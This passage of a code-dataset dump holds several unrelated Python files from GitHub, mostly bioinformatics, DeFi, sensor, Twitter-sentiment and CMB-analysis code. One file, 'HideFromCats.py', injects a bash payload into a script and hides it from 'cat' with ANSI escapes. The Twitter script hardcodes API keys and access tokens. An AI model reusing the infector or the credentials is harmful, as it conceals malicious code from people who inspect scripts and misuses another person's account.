replacer = kmerReplacements[0][0]\n\n                    for index, read in enumerate(all_reads):\n                        kmerIndicesRead = kmersFunction(read, k)\n                        for readKmer in kmerIndicesRead:\n                            if readKmer == kmer:\n                                for starting_position in kmerIndicesRead[readKmer]:\n                                    #rebuild from the current read so earlier replacements in this read are kept\n                                    current = all_reads[index]\n                                    all_reads[index] = current[:starting_position] + replacer + current[starting_position+len(replacer):]\n                                    corrected_set.add(index)\n        \n        return sorted(list(corrected_set)), all_reads, kmerFreq\n    except:\n        print('error')\n        return\n\n\ndef main():\n    try:\n        sys1 = sys.argv[1]\n        sys2 = sys.argv[2]\n        sys3 = sys.argv[3]\n        sys4 = sys.argv[4]\n    except:\n        print('error: bad number of arguments')\n        return\n    try:\n        indices, all_reads, _ = correctionFunc(sys1, sys2, sys3, sys4, True, None)\n\n        print(*indices, sep = \",\")\n        print('--------------------')\n        for read in all_reads:\n            print(read)\n    except:\n        print('')\n        return\n\nif __name__ == \"__main__\":\n    main()","repo_name":"aaronwangj/pr2","sub_path":"correction.py","file_name":"correction.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38953654965","text":"\"\"\"Enzyme vault ERC-20 helpers.\"\"\"\nfrom eth_typing import HexAddress\nfrom web3.contract import Contract\nfrom web3.contract.contract import ContractFunction\n\nfrom eth_defi.abi import encode_function_call\nfrom eth_defi.enzyme.deployment import EnzymeDeployment\nfrom eth_defi.enzyme.generic_adapter import execute_calls_for_generic_adapter\nfrom eth_defi.enzyme.vault import Vault\n\n\ndef prepare_transfer(enzyme: EnzymeDeployment, vault: Vault, generic_adapter: Contract, token: Contract, receiver: HexAddress 
| str, amount: int) -> ContractFunction:\n    \"\"\"Prepare an ERC-20 transfer out from the Enzyme vault.\n\n    - Tells the Enzyme vault to move away some tokens\n\n    :param enzyme:\n        Enzyme deployment\n\n    :param vault:\n        Vault that needs to perform the transfer\n\n    :param generic_adapter:\n        GenericAdapter contract we use to execute the call\n\n    :param token:\n        ERC-20 token we send\n\n    :param receiver:\n        The receiver of tokens\n\n    :param amount:\n        Token amount, raw\n\n    :return:\n        Transaction object that can be signed and executed\n    \"\"\"\n\n    # Prepare the transfer parameters\n    spend_asset_amounts = [amount]\n    spend_assets = [token.address]\n    incoming_assets = []\n    min_incoming_assets_amounts = []\n\n    # The vault performs a plain ERC-20 transfer() call\n    encoded_transfer = encode_function_call(token.functions.transfer, [receiver, amount])\n\n    bound_call = execute_calls_for_generic_adapter(\n        comptroller=vault.comptroller,\n        external_calls=((token, encoded_transfer),),\n        generic_adapter=generic_adapter,\n        incoming_assets=incoming_assets,\n        integration_manager=enzyme.contracts.integration_manager,\n        min_incoming_asset_amounts=min_incoming_assets_amounts,\n        spend_asset_amounts=spend_asset_amounts,\n        spend_assets=spend_assets,\n    )\n\n    return bound_call\n","repo_name":"tradingstrategy-ai/web3-ethereum-defi","sub_path":"eth_defi/enzyme/erc20.py","file_name":"erc20.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":425,"dataset":"github-code","pt":"66"} +{"seq_id":"10193573830","text":"# https://www.acmicpc.net/problem/1965\r\nimport sys\r\n# sys.setrecursionlimit(int(1e9))\r\nsi = sys.stdin.readline\r\nmis = lambda: map(int, si().split())\r\nINF = float('inf')\r\ndx = [-1, 0, 1, 0]\r\ndy = [0, 1, 0, -1]\r\n\r\nif __name__ == '__main__':\r\n    n = int(si())\r\n    B = list(mis())\r\n    \r\n    dp = [1] * n\r\n    ans = 0\r\n    for i in range(1, n):\r\n        for j in range(i):\r\n            if B[j] < B[i]:\r\n                dp[i] = max(dp[i], dp[j] + 1)\r\n        ans = max(ans, dp[i])\r\n    print(ans)","repo_name":"punkryn/problem-solving","sub_path":"백준/Silver/1965. 
상자넣기/상자넣기.py","file_name":"상자넣기.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4143521733","text":"\nimport sys\nimport os\n\nimport gzip\n\nHOME = os.environ['HOME']\n\nFLYBASE_GENE_NAME_FILE = HOME + \"/data/Dmel/flybase/fbgn_annotation_ID_fb_2012_04.tsv.gz\"\n\n\ndef read_anno_id_to_flybase_gene_name():\n    f = gzip.open(FLYBASE_GENE_NAME_FILE)\n\n    anno2fb_dict = {}\n    \n    for line in f:\n        line = line.rstrip()\n        \n        if line.startswith(\"#\") or line == \"\":\n            continue\n\n        words = line.split(\"\\t\")\n\n        if len(words) < 4:\n            sys.stderr.write(\"WARNING: skipping line: %s\\n\" % line)\n            continue\n        \n        fb_name = words[1]\n        anno_id = words[3]\n\n        if len(words) > 4:\n            additional_ids = words[4].split()\n        else:\n            additional_ids = []\n\n        anno_id_list = additional_ids + [anno_id]\n\n        if fb_name:\n            for a_id in anno_id_list:\n                if a_id in anno2fb_dict:\n                    sys.stderr.write(\"WARNING: repeated annotation id: %s\\n\" %\n                                     a_id)\n                else:\n                    anno2fb_dict[a_id] = fb_name\n\n            # sys.stderr.write(\"'%s' => '%s'\\n\" % (anno_id, fb_name))\n\n\n    return anno2fb_dict\n    \n\n\ndef main():\n    if len(sys.argv) != 2:\n        sys.stderr.write(\"usage: %s \\n\" %\n                         sys.argv[0])\n        exit(2)\n    \n    anno2fb_dict = read_anno_id_to_flybase_gene_name()\n\n\n    input_file = sys.argv[1]\n    f = open(input_file)\n    header = f.readline()\n    if header.startswith(\"CG\"):\n        # doesn't look like a header\n        f.seek(0)\n    else:\n        sys.stdout.write(header)\n    \n    for line in f:\n        words = line.rstrip().split(None, 1)\n        anno_id = words[0]\n\n        anno_id = anno_id.split(\"-\")[0]\n        \n        if anno_id in anno2fb_dict:\n            fb_name = anno2fb_dict[anno_id]\n            sys.stdout.write(\"%s %s\\n\" % (fb_name, words[1]))\n        else:\n            sys.stdout.write(line)\n            sys.stderr.write(\"could not find fbname for '%s'\\n\" % anno_id)\n    \n    \n\n\n\nmain()\n","repo_name":"gmcvicker/Dmel","sub_path":"python/annotation_id_to_flybase_gene_name.py","file_name":"annotation_id_to_flybase_gene_name.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"3419847030","text":"from django.urls import path\n\nfrom admin.employee.manage import views\n\nurlpatterns = [\n    path(\n        '/accesslog',\n        views.AccessLog.as_view(),\n        name='accesslog'\n    ),\n\n    path(\n        'create',\n        views.Create.as_view(),\n        name='create'\n    ),\n\n    path(\n        '/delete',\n        views.Delete.as_view(),\n        name='delete'\n    ),\n\n    path(\n        '/edit',\n        views.Edit.as_view(),\n        name='edit'\n    ),\n\n    path(\n        '/permission',\n        views.Permission.as_view(),\n        name='permission'\n    ),\n\n    path(\n        'permission/base',\n        views.PermissionBase.as_view(),\n        name='permission-base'\n    ),\n\n    path(\n        'permission/user',\n        views.PermissionUser.as_view(),\n        name='permission-user'\n    ),\n\n    path(\n        'search',\n        views.Search.as_view(),\n        name='search'\n    )\n]\n","repo_name":"gwhcp/api","sub_path":"gwhcp_api/admin/employee/manage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"74840367571","text":"#!/usr/bin/python\nimport sys\nprint(\"HideFromCats - created by [GrzechuG/BlueHat139]\")\n\nif len(sys.argv)!=3:\n    print(\"Usage: python HideFromCats.py [virus_bash] [script_to_infect]\")\n    quit()\nvirus = sys.argv[1]\nfile = sys.argv[2]\npayload = \"\"\nwith open(virus, \"r\") as f:\n    for line in f:\n        line = line.replace(\"\\n\", \"\")\n        payload = 
payload+line+\";\"\npayload = payload+\"exit\"\ninfected = \"\"\nwith open (file, \"r\") as f:\n for line in f:\n infected = infected+line\n if \"#!\" in line:\n infected = infected+\"\"+payload+\"\\n\\n\"+'\\033[A\\033[A'+\" \"*len(payload)+\"\\n\"\nwith open(\"infected.out\", \"w+\") as f:\n f.write(infected)\n\nprint(\"Created infected script as infected.out!\")\n\n \n \n \n","repo_name":"GrzechuG/HideFromCats","sub_path":"HideFromCats.py","file_name":"HideFromCats.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"19098458376","text":"import time\n\nfrom depth_sensor import DepthSensor\n\n\nclass DSController:\n\n def __init__(self):\n self.ds = DepthSensor()\n self.ds.init()\n self.temp = 0\n self.pressure = 0\n self.depth = 0\n\n def set_ref(self):\n self.ds.set_ref_p()\n\n def read_temperature(self):\n self.temp = self.ds.read_temperature()\n return self.temp\n\n def read_pressure(self, it=3):\n p = 0\n for i in range(it):\n p += self.ds.read_pressure()\n self.pressure = p / it\n return self.pressure\n\n def read_depth(self, it=3):\n d = 0\n for i in range(it):\n d += self.ds.read_depth()\n self.depth = d / it\n return self.depth\n\n\nif __name__ == '__main__':\n ds = DSController()\n while True:\n print(\"Depth %.2f m\" % ds.read_depth())\n time.sleep(0.2)\n","repo_name":"knr-auv/odroid-v2","sub_path":"DepthSensor/ds_controller.py","file_name":"ds_controller.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25167222047","text":"#Al:leia n valores com parada no 999, mostrar a soma dos valores digitados e quantos valores foram figitados\n#autor: Lucas Borguezam\n#data:\n\n#Import\n\n#Inicio\ni = acu = v =0\n\nwhile True:\n v = int(input(\"Digite o valor desejado(código de parada 999)\"))\n if v == 999:\n break\n i += 1\n acu += v\nprint(f\"A soma é {acu} de {i} números digitados\")\n#fim\n","repo_name":"luscaborguezam/Aprendendo_Python","sub_path":"Exercicios_M1_M2/desafio66.py","file_name":"desafio66.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40706851344","text":"# importing the required modules\nimport tweepy\n\n# Getting the API from the my twitter account using tweepy\ndef get_twitter_api( ):\n # Consumer key, consumer secret, access token and access secret\n # from twitter application\n consumer_key = \"bDa4E2lGtdIG5nd3bvDinpThH\"\n consumer_secret = \"KNF61HTnZMWJjizkwNo6tznmYcEB8zEUo9V0bjs8Lf9fKRVw6x\"\n access_token = \"863437146077581312-Zl4aeEog8hoZ5W3e0Q5DjRYlUTvy7JN\"\n access_token_secret = \"Ho4fz2AEckYc6BaXHVs1OuRyzAJdxADcbVmGqKa63UUBx\"\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth)\n return api\n\n# Analysing the words form the tweets and returning number of positive and negative words.\ndef wordanalysis ( pos_words, neg_words, celeb_tweets ):\n pos = 0\n neg = 0\n celeb_word = celeb_tweets.split(\" \")\n for i in celeb_word:\n if i in pos_words:\n pos += 1\n elif i in neg_words:\n neg += 1\n return pos, neg\n\n#Analysing the celebrity details from tweets\ndef tweetanalysis( celeb_data ):\n api = get_twitter_api()\n pos_file = open(\"pos_word.txt\",'r')\n neg_file = open(\"neg_word.txt\",'r')\n pos_word = (pos_file.read()).split(\"\\n\")\n neg_word = 
(neg_file.read()).split(\"\\n\")\n for i in range(len(celeb_data)):\n positive = 0\n negative = 0\n celeb_tweets = api.search(celeb_data[i][\"Name\"], lang=\"en\", locale=\"en\", count = 50 )\n for tweets in celeb_tweets:\n p,n = wordanalysis( pos_word, neg_word, tweets.text )\n positive += p\n negative += n\n if positive > negative :\n celeb_data[i][\"Twitter sentimental analysis\"] = \"POSITIVE\"\n elif negative > positive :\n celeb_data[i][\"Twitter sentimental analysis\"] = \"NEGATIVE\"\n elif positive == negative :\n celeb_data[i][\"Twitter sentimental analysis\"] = \"NEUTRAL\"\n return celeb_data\n","repo_name":"carthi123/python_twitter","sub_path":"tweetanalysis.py","file_name":"tweetanalysis.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29535566477","text":"#adding positional index to support phrase queries\n#Using (1)+(2) processed data\n\n#creating positional index list\nimport Img_TFIDF\nimport query_search\n\npositional_index = {}\ndata_token = Img_TFIDF.noiseless_img_token\nfor key, value in data_token.items():\n d = {}\n i = 0\n for data in value: \n i += 1\n if data in d:\n d[data].append(i)\n else: \n d[data] = [i]\n\n positional_index[key] = d\n\n#query search engine\ndef Pos_query_search(phrase):\n phrase_list = query_search.pre_process_query(phrase)\n positional_index_allquery = {}\n img_list_allquery = []\n\n for key, value in positional_index.items():\n l = []\n for query in phrase_list:\n if query in value: \n l.append(value[query])\n\n if(len(phrase_list) == len(l)):\n query1 = l[0]\n n = len(l)\n\n for data in query1:\n count = 0 \n for i in range(1, n):\n for j in range(5): \n if data+i+j in l[i]:\n count += 1\n break\n if(count == n-1):\n img_list_allquery.append(key)\n break\n \n #printing songs keys of matched songs\n print(img_list_allquery)\n images =img_list_allquery[:10]\n return images\n","repo_name":"Harman-tamu/SnapQuest","sub_path":"positional_search.py","file_name":"positional_search.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31527785816","text":"# achterhalen van alle gebruikte grondsoortnamen in de boringen\n\nimport os\nfrom pathlib import Path\nfrom geoprofielen.helpers import case_insensitive_glob\nfrom geoprofielen.settings import ROOT_DIR\nfrom geoprofielen.objects.borehole import Borehole\nfrom tqdm import tqdm\n\nf = open(os.path.join(ROOT_DIR,\"./data/boringen/unknown_borehole_codes.csv\"), 'w')\nf_errors = open(os.path.join(ROOT_DIR,\"./data/boringen/borehole_read_errors.csv\"), 'w')\nf_coords = open(\"./data/boringen/boreholecoords.csv\", 'w')\n\n\nif __name__ == \"__main__\":\n sfiles = case_insensitive_glob(os.path.join(ROOT_DIR, \"data/boringen\"), \".gef\")\n \n for sfile in tqdm(sfiles):\n borehole = Borehole() \n try:\n borehole.read(str(sfile)) \n except Exception as e:\n f_errors.write(f\"Error reading {sfile} with error {e}.\\n\")\n continue\n\n try:\n borehole.convert()\n borehole.plot(filepath=\"./data/boringen\", filename=f\"{sfile.stem}.png\")\n f_coords.write(f\"{borehole.x},{borehole.y},{Path(borehole.filename).stem}\\n\")\n except Exception as e:\n f.write(f\"{e}\\n\")\n\nf.close()\nf_errors.close()\nf_coords.close()\n 
\n","repo_name":"breinbaas/geoprofielen","sub_path":"geoprofielen/plotallboreholes.py","file_name":"plotallboreholes.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19908363142","text":"import operator\n\noperations_dict = {\n '+': operator.add,\n '-': operator.sub,\n '*': operator.mul,\n '/': operator.truediv,\n}\noperations = ['+','-','*','/','=']\n\n\nmatrix1 = [\n [1,2,3],\n [4,5,6],\n [7,8,9]\n]\n\nmatrix2 = [\n [1,2,3],\n [4,5,6],\n [7,8,9]\n]\n\ninput_operator = '*'\n\ndef matsum(m1, m2, operation):\n if operation in '+-':\n operation_f = operations_dict[operation]\n\n if len(m1) == len(m2):\n result = [[operation_f(m1[i][j], m2[i][j]) for j in range(len(m1[i]))] for i in range(len(m1))]\n return result\n\n if operation == '*':\n multarr = [[sum(a*b for a,b in zip(m1_row,m2_col)) for m2_col in zip(*m2)] for m1_row in m1]\n\n return multarr","repo_name":"armensanoyan/gasianElimination","sub_path":"gaus_app/utils/g_distribution.py","file_name":"g_distribution.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26407395070","text":"import matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport time\nimport argparse\n\nimport healpy as hp\nfrom astropy.io import fits\nfrom pixell import curvedsky, enplot, utils\n\nfrom optweight import sht, map_utils, mat_utils, solvers, operators, preconditioners\n\nopj = os.path.join\nnp.random.seed(39)\n\ndef get_planck_b_ell(rimo_file, lmax):\n '''\n Return b_ell.\n\n Parameters\n ----------\n rimo_file : str\n Path to RIMO beam file.\n lmax : int\n Truncate to this lmax.\n \n Returns\n -------\n b_ell : (npol, nell)\n '''\n \n with fits.open(rimo_file) as hdul: \n b_ell_T = hdul[1].data['T']\n b_ell_E = hdul[1].data['E']\n b_ell_B = hdul[1].data['B']\n \n b_ell = np.zeros((3, lmax+1))\n b_ell[0] = b_ell_T[:lmax+1]\n b_ell[1] = b_ell_E[:lmax+1]\n b_ell[2] = b_ell_B[:lmax+1]\n\n return b_ell\n\ndef main(basedir, draw_constr=False, test_conv=False, niter_cg=20, niter_mg=40,\n no_masked_prec=False, pol_mg=False, use_prec_harm=False, noise_scaling=None,\n no_beam=False, lmax_masked_cg=1500, write_steps=False):\n '''\n \n Parameters\n ----------\n basedir : str\n Output directory.\n draw_constr : bool, optional\n Draw constrained realization.\n test_conv : bool, optional\n Replace b with A(x) for know LCDM x.\n niter_cg : int, optional\n Number of CG steps with nested CG as masked prec.\n niter_mg : int, optional\n Number of CG steps with multigrid as masked prec.\n no_masked_prec : bool, optional\n Do not use the preconditioners for masked pixels.\n pol_mg : bool, optional\n Use the multigrid precondioner for polarization as well\n use_prec_harm : bool, optional\n Use the harmonic preconditioner instead of the pseudo inverse.\n noise_scaling : float, optional\n Scale noise covariance by this number.\n no_beam : bool, optional\n Turn off the beam.\n lmax_masked_cg : int, optional\n Lmax used for nested masked cg preconditioner.\n write_steps : bool, optional\n Write CG steps to disk as alms.\n '''\n \n if test_conv:\n draw_constr = True\n\n lmax = 2500\n\n #maskdir = '/home/adriaand/project/actpol/20201009_pcg_planck/meta'\n maskdir = '/mnt/home/aduivenvoorden/project/actpol/20201009_pcg_planck/meta'\n imgdir = opj(basedir, 'img')\n odir = opj(basedir, 'out')\n\n utils.mkdir(imgdir)\n 
utils.mkdir(odir)\n\n # Load II, IQ, IU, QQ, QU, UU cov.\n cov = hp.read_map(opj(maskdir, 'HFI_SkyMap_100_2048_R3.01_full.fits'), field=(4, 5, 6, 7, 8, 9))\n cov *= 1e12 # Convert from K^2 to uK^2.\n\n if noise_scaling is not None:\n cov *= noise_scaling\n\n cov, minfo = map_utils.healpix2gauss(cov, 2*lmax, area_pow=-1)\n cov_pix = np.zeros((3, 3, cov.shape[-1]))\n cov_pix[0,0] = cov[0]\n cov_pix[0,1] = cov[1]\n cov_pix[0,2] = cov[2]\n cov_pix[1,0] = cov[1]\n cov_pix[1,1] = cov[3]\n cov_pix[1,2] = cov[4]\n cov_pix[2,0] = cov[2]\n cov_pix[2,1] = cov[4]\n cov_pix[2,2] = cov[5]\n\n # NOTE try thresholding low *cov* values.\n #cov_pix = map_utils.round_icov_matrix(cov_pix, rtol=1e-1, threshold=True)\n\n for idx in range(3):\n for jdx in range(3):\n fig, ax = plt.subplots(dpi=300)\n im = ax.imshow(cov_pix[idx,jdx].reshape(minfo.nrow, minfo.nphi[0]), interpolation='none')\n fig.colorbar(im, ax=ax)\n fig.savefig(opj(imgdir, 'cov_real_{}_{}'.format(idx, jdx)))\n plt.close(fig)\n\n for idx in range(3):\n for jdx in range(3):\n fig, ax = plt.subplots(dpi=300)\n im = ax.imshow(np.log10(np.abs(cov_pix[idx,jdx].reshape(minfo.nrow, minfo.nphi[0]))), interpolation='none')\n fig.colorbar(im, ax=ax)\n fig.savefig(opj(imgdir, 'cov_real_log_{}_{}'.format(idx, jdx)))\n plt.close(fig)\n\n icov_pix = mat_utils.matpow(cov_pix, -1)\n icov_pix = map_utils.round_icov_matrix(icov_pix, rtol=1e-2)\n\n for idx in range(3):\n for jdx in range(3):\n fig, ax = plt.subplots(dpi=300)\n im = ax.imshow(np.log10(np.abs(icov_pix[idx,jdx].reshape(minfo.nrow, minfo.nphi[0]))),\n interpolation='none')\n fig.colorbar(im, ax=ax)\n fig.savefig(opj(imgdir, 'icov_{}_{}'.format(idx, jdx)))\n plt.close(fig)\n\n mask_I = hp.read_map(opj(maskdir, 'COM_Mask_Likelihood-temperature-100-hm2_2048_R3.00.fits'), field=0)\n mask_I, _ = map_utils.healpix2gauss(mask_I[np.newaxis,:], 2*lmax, area_pow=0)\n mask_I[mask_I>=0.1] = 1\n mask_I[mask_I<0.1] = 0\n\n mask_P = hp.read_map(opj(maskdir, 'COM_Mask_Likelihood-polarization-100-hm2_2048_R3.00.fits'), field=0)\n mask_P, _ = map_utils.healpix2gauss(mask_P[np.newaxis,:], 2*lmax, area_pow=0)\n mask_P[mask_P>=0.1] = 1\n mask_P[mask_P<0.1] = 0\n\n print('fsky T', np.sum(map_utils.inv_qweight_map(mask_I, minfo, qweight=True)) / 4 / np.pi)\n print('fsky P', np.sum(map_utils.inv_qweight_map(mask_P, minfo, qweight=True)) / 4 / np.pi)\n\n mask_gl = np.zeros((3, mask_I.shape[-1]))\n mask_gl[0] = mask_I\n mask_gl[1] = mask_P\n mask_gl[2] = mask_P\n\n # Load beam.\n b_ell = get_planck_b_ell(opj(maskdir, 'BeamWf_HFI_R3.01', 'Bl_TEB_R3.01_fullsky_100x100.fits'), lmax)\n if no_beam:\n b_ell = np.ones_like(b_ell)\n\n # Preprare spectrum. 
Input file is Dls in uk^2.\n c_ell = np.loadtxt(\n opj(maskdir, 'COM_PowerSpect_CMB-base-plikHM-TTTEEE-lowl-lowE-lensing-minimum-theory_R3.01.txt'),\n skiprows=1, usecols=[1, 2, 3, 4]) # TT, TE, EE, BB.\n c_ell = c_ell.T\n ells = np.arange(lmax + 1)\n dells = ells * (ells + 1) / 2 / np.pi\n cov_ell = np.zeros((3, 3, lmax + 1))\n cov_ell[0,0,2:] = c_ell[0,:lmax-1] \n cov_ell[0,1,2:] = c_ell[1,:lmax-1] \n cov_ell[1,0,2:] = c_ell[1,:lmax-1] \n cov_ell[1,1,2:] = c_ell[2,:lmax-1] \n cov_ell[2,2,2:] = c_ell[3,:lmax-1] \n\n fig, axs = plt.subplots(ncols=3, nrows=3, dpi=300, constrained_layout=True)\n for idxs, ax in np.ndenumerate(axs):\n axs[idxs].plot(cov_ell[idxs])\n fig.savefig(opj(imgdir, 'cov_ell'))\n plt.close(fig)\n\n cov_ell[...,1:] /= dells[1:]\n\n icov_ell = np.ones((3, 3, lmax + 1))\n for lidx in range(icov_ell.shape[-1]):\n if lidx < 2:\n # Set monopole and dipole to zero.\n icov_ell[:,:,lidx] = 0\n else:\n icov_ell[:,:,lidx] = np.linalg.inv(cov_ell[:,:,lidx])\n\n # Draw alms.\n alm, ainfo = curvedsky.rand_alm(cov_ell, return_ainfo=True)\n\n if not test_conv:\n for pidx in range(alm.shape[0]):\n hp.almxfl(alm[pidx], b_ell[pidx], inplace=True)\n # Draw map-based noise and add to alm.\n noise = map_utils.rand_map_pix(cov_pix)\n alm_noise = alm.copy()\n sht.map2alm(noise, alm_noise, minfo, ainfo, [0,2], adjoint=False)\n nl = ainfo.alm2cl(alm_noise[:,None,:], alm_noise[None,:,:])\n\n fig, axs = plt.subplots(ncols=3, nrows=3, dpi=300, constrained_layout=True)\n for idxs, ax in np.ndenumerate(axs):\n axs[idxs].plot(nl[idxs])\n fig.savefig(opj(imgdir, 'n_ell'))\n plt.close(fig)\n\n if not test_conv:\n \n imap = np.zeros((3, minfo.npix))\n sht.alm2map(alm, imap, ainfo, minfo, [0, 2])\n imap += noise \n imap *= mask_gl\n\n niter = niter_cg + niter_mg\n\n ps_c_ell = np.zeros((niter, 3, 3, lmax + 1))\n cg_errors = np.zeros(niter + 1)\n chisqs = np.zeros(niter + 1)\n errors = np.zeros((4, niter + 1)) # Total, I, E, B.\n residuals = np.zeros(niter + 1)\n times = np.zeros(niter)\n qforms = np.zeros(niter)\n\n solver = solvers.CGWienerMap.from_arrays(imap, minfo, ainfo, icov_ell, icov_pix, minfo, b_ell=b_ell,\n draw_constr=draw_constr, mask_pix=mask_gl, spin=[0, 2],\n swap_bm=True)\n \n prec_pinv = preconditioners.PseudoInvPreconditioner(\n ainfo, icov_ell, icov_pix, minfo, [0, 2], b_ell=b_ell)\n\n prec_harm = preconditioners.HarmonicPreconditioner(\n ainfo, icov_ell, b_ell=b_ell, icov_pix=icov_pix, minfo=minfo)\n\n prec_masked_cg = preconditioners.MaskedPreconditionerCG(\n ainfo, icov_ell, [0, 2], mask_gl.astype(bool), minfo, lmax=lmax_masked_cg, \n nsteps=15, lmax_r_ell=None)\n\n if pol_mg:\n prec_masked_mg = preconditioners.MaskedPreconditioner(\n ainfo, icov_ell, [0, 2], mask_gl[0].astype(bool), minfo,\n min_pix=10000, n_jacobi=1, lmax_r_ell=6000)\n else:\n print('normal mg')\n prec_masked_mg = preconditioners.MaskedPreconditioner(\n ainfo, icov_ell[0:1,0:1], 0, mask_gl[0].astype(bool), minfo,\n min_pix=10000, n_jacobi=1, lmax_r_ell=6000)\n\n if use_prec_harm:\n solver.add_preconditioner(prec_harm)\n else:\n print('normal pinv')\n solver.add_preconditioner(prec_pinv)\n\n if not no_masked_prec:\n print('normal cg')\n solver.add_preconditioner(prec_masked_cg)\n solver.init_solver()\n\n if test_conv:\n print('test_conv')\n # Replace b with A(x) such that we can compute error.\n solver.b_vec = solver.A(alm)\n solver.b0 = solver.b_vec.copy()\n solver.init_solver()\n\n cg_errors[0] = 1\n #chisqs[0] = solver.get_chisq()\n errors[0,0] = np.sqrt(solver.dot(alm, alm))\n errors[1,0] = 
np.sqrt(solver.dot(alm[0], alm[0]))\n errors[2,0] = np.sqrt(solver.dot(alm[1], alm[1]))\n errors[3,0] = np.sqrt(solver.dot(alm[2], alm[2]))\n residuals[0] = solver.get_residual()\n \n for idx in range(niter_cg):\n t0 = time.time()\n solver.step()\n dt = time.time() - t0 \n if write_steps:\n hp.write_alm(opj(odir, f'alm_x_{idx}.fits'), solver.get_wiener(),\n overwrite=True)\n residual = solver.get_residual()\n #chisq = solver.get_chisq() \n diff = solver.x - alm\n \n cg_errors[idx+1] = solver.err\n errors[0,idx+1] = np.sqrt(solver.dot(diff, diff))\n errors[1,idx+1] = np.sqrt(solver.dot(diff[0], diff[0]))\n errors[2,idx+1] = np.sqrt(solver.dot(diff[1], diff[1]))\n errors[3,idx+1] = np.sqrt(solver.dot(diff[2], diff[2]))\n residuals[idx+1] = residual\n #chisqs[idx+1] = chisq\n times[idx] = dt\n qforms[idx] = solver.get_qform()\n ps_c_ell[idx,...] = ainfo.alm2cl(solver.x[:,None,:], solver.x[None,:,:])\n \n #print(f'{solver.i}, cg_err : {solver.err}, chisq : {chisq}, residual : {residual}, '\n # f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n # f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n print(f'{solver.i}, cg_err : {solver.err}, residual : {residual}, '\n f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n\n solver.reset_preconditioner()\n if use_prec_harm:\n solver.add_preconditioner(prec_harm)\n else:\n print('normal pinv 2')\n solver.add_preconditioner(prec_pinv)\n\n if not no_masked_prec:\n if pol_mg:\n solver.add_preconditioner(prec_masked_mg)\n else:\n print('normal mg 2')\n solver.add_preconditioner(prec_masked_mg, sel=np.s_[0])\n solver.b_vec = solver.b0\n solver.init_solver(x0=solver.x)\n\n for idx in range(niter_cg, niter_cg + niter_mg):\n\n t0 = time.time()\n solver.step()\n dt = time.time() - t0 \n if write_steps:\n hp.write_alm(opj(odir, f'alm_x_{idx}.fits'), solver.get_wiener(),\n overwrite=True)\n residual = solver.get_residual()\n #chisq = solver.get_chisq() \n diff = solver.x - alm\n \n cg_errors[idx+1] = solver.err * cg_errors[niter_cg]\n errors[0,idx+1] = np.sqrt(solver.dot(diff, diff))\n errors[1,idx+1] = np.sqrt(solver.dot(diff[0], diff[0]))\n errors[2,idx+1] = np.sqrt(solver.dot(diff[1], diff[1]))\n errors[3,idx+1] = np.sqrt(solver.dot(diff[2], diff[2]))\n residuals[idx+1] = residual\n #chisqs[idx+1] = chisq\n times[idx] = dt\n qforms[idx] = solver.get_qform()\n ps_c_ell[idx,...] 
= ainfo.alm2cl(solver.x[:,None,:], solver.x[None,:,:])\n \n #print(f'{solver.i}, cg_err : {solver.err}, chisq : {chisq}, residual : {residual}, '\n # f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n # f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n print(f'{solver.i}, cg_err : {solver.err}, residual : {residual}, '\n f'err[0] : {errors[1,idx+1]}, err[1] : {errors[2,idx+1]}, '\n f'err[2] : {errors[3,idx+1]}, qform = {qforms[idx]}, dt : {dt}')\n\n np.save(opj(odir, 'ps_c_ell'), ps_c_ell)\n np.save(opj(odir, 'n_ell'), nl)\n np.save(opj(odir, 'cov_ell'), cov_ell)\n np.save(opj(odir, 'b_ell'), b_ell)\n np.save(opj(odir, 'cg_errors'), cg_errors)\n np.save(opj(odir, 'errors'), errors)\n np.save(opj(odir, 'residuals'), residuals)\n np.save(opj(odir, 'times'), times)\n #np.save(opj(odir, 'chisqs'), chisqs)\n\n fig, axs = plt.subplots(ncols=3, nrows=3, dpi=300, constrained_layout=True, squeeze=False)\n for ax in axs.ravel():\n ax.set_prop_cycle('color',[plt.cm.plasma(i) for i in np.linspace(0, 1, niter)])\n for idx in range(niter):\n for aidxs, ax in np.ndenumerate(axs):\n axs[aidxs].plot(ells, dells * ps_c_ell[idx,aidxs[0],aidxs[1]],\n lw=0.5)\n for aidxs, ax 